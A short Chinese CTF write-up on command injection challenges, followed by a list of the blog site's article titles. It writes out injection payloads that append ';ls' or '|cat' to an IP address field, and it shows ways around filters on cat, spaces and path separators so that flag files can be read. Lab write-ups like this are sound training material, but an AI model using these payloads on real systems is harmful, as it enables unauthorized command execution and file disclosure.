命令注入

源码直接给了出来尝试127.0.0.1;ls

发现一串数字的php文件cat查看
127.0.0.1|cat 233382768628619.php

查看源码发现flag

过滤cat

这题和上一题差不多只不过把cat给过滤掉了，过滤了cat我们可以用一下几种方法绕过
tac 从最后一行倒序显示内容，并将所有内容输出
more 根据窗口大小，一页一页的现实文件内容
less 和more类似，但其优点可以往前翻页，而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n，显示时输出行号
tailf 类似于tail -f
使用127.0.0.1|tail (flag文件名)

查看源码发现flag

过滤空格

源码直接给了出来发现把空格给过滤了
使用127.0.0.1|ls

查看flag
127.0.0.1|cat<flag_7294130653.php

过滤目录分隔符

源码将\过滤掉了
使用127.0.0.1|ls

127.0.0.1;cd flag_is_here;ls

然后直接cat得出flag
127.0.0.1;cd flag_is_here;cat flag_30272158003930.php

得出flag
还有部分晚点再发今天就暂时分享这么多

最新文章

1. Android LayoutInflater.inflate(int resource, ViewGroup root, boolean attachToRoot)的参数理解
2. .NET委托和事件
3. ubuntu 安装MTK 移动终端usb驱动
4. Nginx配置文件详细说明
5. WIN8系统安装软件时提示&quot;扩展属性不一致&quot;的解决方法
6. LeetCode(四)
7. C++ Copy Elision
8. 转：python webdriver API 之操作测试对象
9. sqlserver重命名字段名称
10. xampp
11. Android Framework------之Input子系统
12. Java如何将Exception.printStackTrace()转换为String输出
13. Egret 矢量绘图、遮罩、碰撞检测
14. 队列（链式存储）JAVA代码
15. JavaScript表单验证年龄
16. .Net——使用.net内置处理程序处理自己定义节点Demo
17. MaidSafe.net，一个完全去中心的化的云存储系统
18. listener.ora中PLSExtPro 和ExtProc的作用（转）
19. Robotium源码分析之运行原理
20. adobe air for ios 例子

热门文章

1. 解决gpg failed to sign the data fatal: failed to write commit object解决方案
2. shell中echo基础及高级用法详解-渐入佳境
3. selenium+python自动化101-使用execute_script() 方法获取 JavaScript 返回值
4. 命令行窗口cmd:访问C盘根目录和其他盘
5. 解决 “Project ERROR: Unknown module(s) in QT: webengine”以及“Your MaintenanceTool appears to be older than 3.0.2. .” 的办法
6. WPS：Excel删除指定行以后的所有行
7. （转载）虚拟化(3)：os调度策略。
8. django程序在windows服务器上发布
9. oracle 中的decode函数
10. Mysql基础语法-建库-建表(增、删、改、查、表关联及子查询)